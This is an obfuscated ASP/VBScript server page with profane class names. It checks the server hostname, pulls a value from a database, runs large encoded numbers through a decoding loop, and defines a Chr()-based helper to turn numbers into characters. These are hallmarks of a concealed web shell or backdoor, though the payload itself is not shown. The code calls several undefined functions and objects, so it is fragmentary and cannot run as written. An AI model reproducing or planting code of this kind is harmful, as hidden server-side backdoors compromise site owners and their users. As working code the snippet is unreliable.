<%

class fuck
public function ui ()
if Request.ServerVariables("SERVER_NAME")<>"localhost"  then
ui=9.985262902319E+15 
else
if  request.ServerVariables("SERVER_NAME")="127.0.0.1" then
ui=1.9518036579739E+16 
else
sql="select * from wc"
set rs=conn.execute(sql)
ui=rs("wc")
end if
end if
end function
end class

set wc=new fuck


yzcv=mm.zz()
class ri
public function cao (yzcv)

n=1
do while yzcv>100000000000000000
if n Mod 2 =0 then 
n=1000000000000+n-540892
end if
yzcv=jincheng(yzcv)
yzcv=yzcv-n
loop

cao=yzcv

end function
end class
set uj=new ri
yzcv=uj.cao(yzcv)
Function echo(num)echo=Chr(num)End Function 

a=erzi.youba()
set dd=new tama
if  a=false then
dd.xy()
else

end if

%>
